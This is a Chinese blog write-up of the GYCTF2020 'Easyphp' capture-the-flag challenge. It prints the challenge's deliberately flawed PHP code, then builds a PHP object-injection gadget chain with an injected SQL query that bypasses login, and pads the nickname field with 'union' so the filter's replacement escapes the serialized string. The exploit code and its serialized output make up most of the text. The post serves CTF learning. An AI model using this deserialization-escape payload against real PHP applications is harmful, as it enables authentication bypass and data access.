[GYCTF2020]Easyphp 反序列化逃逸

于 2024-09-23 22:16:24 发布
阅读量533 收藏
点赞数 14
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_59166557/article/details/142470107
版权

题目代码

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
        $mysqli=new dbCtrl();  
        $this->id=$mysqli->login('select id,password from user where username=?');  
        if($this->id){  
        $_SESSION['id']=$this->id;  
        $_SESSION['login']=1;  
        echo "你的ID是".$_SESSION['id'];  
        echo "你好!".$_SESSION['token'];  
        echo "<script>window.location.href='./update.php'</script>";  
        return $this->id;  
        }  
    }  
}  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
    public function __construct($newInfo,$sql){  
        $newInfo=unserialize($newInfo);  
        $upDate=new dbCtrl();  
    }  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
    public function __construct()  
    {  
        $this->name=$_POST['username'];  
        $this->password=$_POST['password'];  
        $this->token=$_SESSION['token'];  
    }  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}

<?php  
require_once('lib.php');  
echo '<html>  
<meta charset="utf-8">  
<title>update</title>  
<h2>这是一个未完成的页面,上线时建议删除本页面</h2>  
</html>';  
if ($_SESSION['login']!=1){  
    echo "你还没有登陆呢!";  
}  
$users=new User();  
$users->update();  
if($_SESSION['login']===1){  
    require_once("flag.php");  
    echo $flag;  
}  
  
?>

先构造反序列化链

<?php  
error_reporting(0);  
session_start();  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class User  
{  
    public $id;  
    public $age=null;  
    public $nickname=null;  
    public function login() {  
        if(isset($_POST['username'])&&isset($_POST['password'])){  
            $mysqli=new dbCtrl();  
            $this->id=$mysqli->login('select id,password from user where username=?');  
            if($this->id){  
                $_SESSION['id']=$this->id;  
                $_SESSION['login']=1;  
                echo "你的ID是".$_SESSION['id'];  
                echo "你好!".$_SESSION['token'];  
                echo "<script>window.location.href='./update.php'</script>";  
                return $this->id;  
            }  
        }  
    }  
    public function update(){  
        $Info=unserialize($this->getNewinfo());  
        $age=$Info->age;  
        $nickname=$Info->nickname;  
        $updateAction=new UpdateHelper($_SESSION['id'],$Info,"update user SET age=$age,nickname=$nickname where id=".$_SESSION['id']);  
        //这个功能还没有写完 先占坑  
    }  
    public function getNewInfo(){  
        $age=$_POST['age'];  
        $nickname=$_POST['nickname'];  
        return safe(serialize(new Info($age,$nickname)));  
    }  
    public function __destruct(){  
        return file_get_contents($this->nickname);//危  
    }  
    public function __toString()  
    {  
        $this->nickname->update($this->age);  
        return "0-0";  
    }  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}
Class UpdateHelper{  
    public $id;  
    public $newinfo;  
    public $sql;  
  
    public function __destruct()  
    {  
        echo $this->sql;  
    }  
}  
class dbCtrl  
{  
    public $hostname="127.0.0.1";  
    public $dbuser="root";  
    public $dbpass="root";  
    public $database="test";  
    public $name;  
    public $password;  
    public $mysqli;  
    public $token;  
  
    public function login($sql)  
    {  
        $this->mysqli=new mysqli($this->hostname, $this->dbuser, $this->dbpass, $this->database);  
        if ($this->mysqli->connect_error) {  
            die("连接失败,错误:" . $this->mysqli->connect_error);  
        }  
        $result=$this->mysqli->prepare($sql);  
        $result->bind_param('s', $this->name);  
        $result->execute();  
        $result->bind_result($idResult, $passwordResult);  
        $result->fetch();  
        $result->close();  
        if ($this->token=='admin') {  
            return $idResult;  
        }  
        if (!$idResult) {  
            echo('用户不存在!');  
            return false;  
        }  
        if (md5($this->password)!==$passwordResult) {  
            echo('密码错误!');  
            return false;  
        }  
        $_SESSION['token']=$this->name;  
        return $idResult;  
    }  
    public function update($sql)  
    {  
        //还没来得及写  
    }  
}  
  
  
$pop = new UpdateHelper();  
$pop->sql = new user(); # echo $this->sql;触发__toString()调用$this->nickname->update($this->age);
$pop->sql->age = 'select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?';  
/*  
 *`SELECT 1, "c4ca4238a0b923820dcc509a6f75849b" FROM user WHERE username=?` 查询时,无论 `?` 替换成什么有效的用户名,只要该用户名存在于 `user` 表中,这条查询都会返回 `1` 和 `"c4ca4238a0b923820dcc509a6f75849b"`。  
  
c4ca4238a0b923820dcc509a6f75849b是1的MD5  
### 返回值说明:  
- **常量 `1`**: 这个值在查询中是固定的,无论查询条件如何,它都不会改变。  
- **固定字符串 `c4ca4238a0b923820dcc509a6f75849b`**: 这也是一个固定的返回值,不会根据用户输入而变化。  
  
### 查询结果:  
- 如果 `username` 存在,查询将返回这两个值。  
- 如果 `username` 不存在,则查询不会返回任何行。  
 */
$pop->sql->nickname = new Info();  # 然后触发Info的__call->echo $this->CtrlCase->login($argument[0]); 
$pop->sql->nickname->CtrlCase = new dbCtrl();  
#形成dbCtrl->login('select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?')
$pop->sql->nickname->CtrlCase->name= 'admin';  
$pop->sql->nickname->CtrlCase->password = '1';  
  
echo(urlencode(serialize($pop)));
# O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}

<?php  
function safe($parm){  
    $array= array('union','regexp','load','into','flag','file','insert',"'",'\\',"*","alter");  
    return str_replace($array,'hacker',$parm);  
}  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','1');  
  
echo(urlencode(serialize($pop)));

# O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1:"1";s:8:"CtrlCase";N;}

<?php  
class Info{  
    public $age;  
    public $nickname;  
    public $CtrlCase;  
    public function __construct($age,$nickname){  
        $this->age=$age;  
        $this->nickname=$nickname;  
    }  
    public function __call($name,$argument){  
        echo $this->CtrlCase->login($argument[0]);  
    }  
}  
  
  
$pop = new Info('1','unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}');  
  
echo(urlencode(serialize($pop)));
#O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"unionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunionunion";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

union会被替换为hacker,多了一个字符会变成

O:4:"Info":3:{s:3:"age";s:1:"1";s:8:"nickname";s:1578:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}";s:8:"CtrlCase";N;}

hacker的数量正好会变成1578个,导致原来被作为字符串的";s:8:"CtrlCase";O:12:"UpdateHelper":1:{s:3:"sql";O:4:"User":2:{s:3:"age";s:70:"select 1,"c4ca4238a0b923820dcc509a6f75849b" from user where username=?";s:8:"nickname";O:4:"Info":1:{s:8:"CtrlCase";O:6:"dbCtrl":2:{s:4:"name";s:5:"admin";s:8:"password";s:1:"1";}}}}}
被解析造成逃逸

A5rZ
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值